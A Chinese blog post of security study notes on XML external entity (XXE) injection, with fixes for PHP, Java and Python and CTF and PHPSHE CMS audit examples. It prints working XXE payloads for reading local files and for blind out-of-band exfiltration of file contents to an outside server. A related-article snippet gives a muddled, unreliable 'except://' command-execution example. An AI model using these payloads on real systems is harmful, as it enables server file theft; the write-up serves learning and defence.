day41 XML&XXE&无回显&DTD实体&伪协议&代码审计

最新推荐文章于 2024-08-13 14:55:37 发布
最新推荐文章于 2024-08-13 14:55:37 发布
阅读量487 收藏
点赞数
分类专栏: 靶场日记 文章标签: xml 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/128248197
版权

前言

#知识点:

1、XML&XXE-原理&发现&利用&修复等

2、XML&XXE-黑盒模式下的发现与利用

3、XML&XXE-白盒模式下的审计与利用

4、XML&XXE-无回显&伪协议&产生层面

#思路点:

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

-XXE黑盒发现:

1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe

3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行

-XXE白盒发现:

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

#详细点:

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML 与 HTML 的主要差异:

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

HTML 旨在显示信息 ,而 XML 旨在传输信息。

XXE修复防御方案:

-方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

-方案2-过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

#XML&XXE-黑盒-原理&探针&利用&玩法等


参考:https://www.cnblogs.com/20175211lyz/p/11413335.html
1、读取文件:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
1.1、带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
2、外部引用实体dtd:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
evil2.dtd
<!ENTITY send SYSTEM "file:///d:/e.txt">
3、无回显读文件
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
4、其他玩法(协议)-见参考地址

#XML&XXE-前端-CTF&Jarvisoj&探针&利用


http://web.jarvisoj.com:9882/
XXE黑盒发现:
1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试
2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe
流程:功能分析-前端提交-源码&抓包-构造Paylod测试
更改请求数据格式:Content-Type
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&f;</x>


#XML&XXE-白盒-CMS&PHPSHE&无回显审计


审计流程:
1、漏洞函数simplexml_load_string
2、pe_getxml函数调用了漏洞函数
3、wechat_getxml调用了pe_getxml
4、notify_url调用了wechat_getxml
访问notify_url文件触发wechat_getxml函数,构造Paylod测试
先尝试读取文件,无回显后带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
然后带外传递数据解决无回显:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

匿名用户0x3c
关注
专栏目录
XXE进阶—与php伪协议组合利用
afei001
05-09 566
目录 1.XXE外部实体默认支持的协议 2.XXE结合file://协议利用 3.XXE结合php://filter利用读取php文件 4.XXE文件读取EXP 5.XXE结合http://协议利用 5.1 端口探测 5.2 内网端口探测脚本 5.3 Blind XXE反弹数据读取文件 5.4 Blind XXE测试方法 6.XXE结合expect://利用 1.XXE外部实体默认支持的协议 实例代码:xml.php <?php //false,表示允许加..
XML&XXE安全
初岄的博客
03-10 189
更多笔记查看:Introduction · DY安全知识库 XXE漏洞介绍 XXE全称XML External Entity Injection,即外部实体注入。owasp网站对其的描述是:XXE是针对应用程序解析XML输入类型的攻击。当包含对外部实体的引用的 XML 输入被弱配置的 XML 解析器处理时,就会发生这种攻击。这种攻击可能导致机密数据泄露、拒绝服务、服务器端请求伪造、从解析器所在机器的角度进行端口扫描,以及其他系统影响。 XML基础知识 XML 指可扩展标记语言(EXtensible
XXE回显攻击详解
永远是少年
12-23 1560
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE回显攻击详解。 一、XXE回显攻击简介 二、XXE回显攻击实战
【第59课】XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
最新发布
Lucker_YYY的博客
08-13 198
知识点:1、XXE&XML-原理-用途&外实体&安全2、XXE&XML-黑盒-格式类型&数据类型3、XXE&XML-白盒-函数审计&方案。
windows文件读取 xxe_XXE原来如此简单(无回显篇)
weixin_35531726的博客
01-06 1079
可能有人会好奇我为什么非要分成两篇来分享呢?我的考虑是学习需要循序渐进学习也不可能一蹴而就短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用重点: 那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将...
XXE回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2313
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
siu~
11-02 558
知识点: 1、XXE&XML-原理-用途&外实体&安全 2、XXE&XML-黑盒-格式类型&数据类型 3、XXE&XML-白盒-函数审计&回显方案
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
防止XXE的方法是限制XML解析器对外部实体的访问,或者完全禁用外部实体。 3. **反序列化漏洞**: Java的反序列化机制允许对象的状态从字节流恢复到对象实例。然而,如果序列化和反序列化过程没有正确地进行安全控制...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
在某些场景下,如果XML解析器不正确地处理外部实体,就会引发XXEXML External Entity Injection)漏洞。 **XML声明**:XML声明告诉解析器文档使用的XML版本和字符编码,例如`<?xml version="1.0"?>`。 **DTD文档...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
(渗透学习)XXE漏洞原理 & 挖掘 & 利用 & 防御
yang1234567898的博客
01-15 5865
1、什么是XMLxml和html结构类似,不同的是: XML 被设计用来传输和存储数据。 HTML 被设计用来显示数据。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素 (1)什么是DTD? 文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 ① 内部的 DOCTYPE 声明: <!DOCTYPE 根元素 [元素声明]> 如下就
WEB-XMLXXE漏洞-伪协议
qq_43306559的博客
12-04 1305
前言 在做unctf时遇到一道web题,是xmlxxe漏洞(Do you like xml),当时没做出来,没反应过来这个知识点,后来经人指点稍微理解了一些关于这个的漏洞,又在判作业中看到了这个知识点,所以决定记录下来 XMLXXE漏洞及伪协议利用 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构...
XXE漏洞复现(有无回显
cainiao17441898的博客
07-01 1796
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
浅析无回显XXE(Blind XXE
蚁景网安学院
05-11 1309
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
mysql注入 无回显_XML外部实体注入2:无回显XXE
weixin_42309785的博客
01-28 500
生如夏花之绚烂,死如秋叶之静美。—— 泰戈尔 《生如夏花》01XML基础XML首先要先说下 xmlxml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟 html 是为不同目的而设计的,html 旨在显示数据信息,而 xml 旨在传输数据信息。而且xml的标签是自己自定义,且标签一定要闭合,语法比html严格(毕竟h...
回显练习~XXE注入
weixin_67832625的博客
07-31 214
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 978
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
xxe漏洞提取无回显数据
qq_42307546的博客
01-26 566
<?php $string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml 实体注入</body></note>'; $xml = isset($_GET['xml'])?$_GET
XXE环境搭建及实战 包含有回显回显操作
t小小小白的博客
08-19 5650
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
在pikachu靶场平台利用XXE漏洞调用except伪协议调用系统命令,执行系统命令
05-23
首先需要了解什么是XXE漏洞,它是指攻击者可以通过向Web应用程序发送恶意XML文件来触发应用程序内部的XML解析器,并导致攻击者能够读取任意文件、执行任意命令等攻击。 接下来,我们需要利用XXE漏洞调用except伪协议来执行系统命令。except伪协议是一种在XML文档中嵌入任意数据的方法,它的语法如下: ``` <!ENTITY name SYSTEM "file:///path/to/file"> ``` 其中name为实体名称,可以在XML文档中通过&name;来引用,file:///path/to/file为要读取的文件路径。 我们可以利用这个语法来执行系统命令,具体步骤如下: 1. 构造包含XXE漏洞的XML文件,例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> ``` 这个XML文件包含一个名为xxe实体,它的值为file:///etc/passwd,表示要读取/etc/passwd文件。 2. 将XML文件发送到目标应用程序,并触发XXE漏洞。如果漏洞存在,则应用程序会解析XML文件,并读取xxe实体的值。 3. 修改实体的值,将它改为要执行的系统命令。例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "except://`ls /`"> ]> <foo>&xxe;</foo> ``` 这个XML文件将xxe实体的值改为了except://`ls /`,表示要执行ls /命令。 4. 再次发送XML文件到目标应用程序,触发XXE漏洞,并执行系统命令。 需要注意的是,如果目标系统禁止了except伪协议,则无法利用这种方法执行系统命令。此外,执行系统命令可能会产生安全风险,建议仅在测试环境中使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值